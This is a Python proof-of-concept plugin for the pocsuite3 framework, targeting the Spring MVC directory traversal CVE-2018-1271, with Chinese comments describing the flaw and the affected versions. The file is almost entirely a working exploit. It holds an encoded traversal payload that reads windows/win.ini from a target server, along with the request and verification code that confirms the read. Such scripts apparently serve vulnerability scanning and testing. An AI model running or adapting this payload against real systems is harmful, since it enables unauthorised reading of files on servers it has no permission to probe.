#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {'user-agent': 'ceshi/0.0.1', 'content-type': 'text/xml'}
poc_str = '''spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'spring_mvc_CVE-2018-1271'
    vulID = 'CVE-2018-1271'  # https://www.seebug.org/vuldb/ssvid-97483
    author = ['debug']
    vulType = '目录遍历'  # 任意文件读取
    version = '1.0'  # default version: 1.0
    references = [
        'https://blog.knownsec.com/2018/08/spring-mvc-%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9Ecve-2018-1271%E5%88%86%E6%9E%90/']
    desc = '''
		   Spring MVC存在一个目录穿越漏洞(CVE-2018-1271)。
		   Spring Framework版本5.0到5.0.4,4.3到4.3.14以及较旧的不受支持的版本允许应用程序配置Spring MVC以提供静态资源（例如CSS，JS，图像）。
		   当Spring MVC的静态资源存放在Windows系统上时，攻击可以通过构造特殊URL导致目录遍历漏洞。
		   '''
    vulDate = '2020-02-5'
    createDate = '2020-02-5'
    updateDate = '2020-02-5'
    appName = 'Spring Framework'
    appVersion = '5.0 to 5.0.4，4.3 to 4.3.14'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'app support' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'Spring MVC_CVE-2018-1271' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
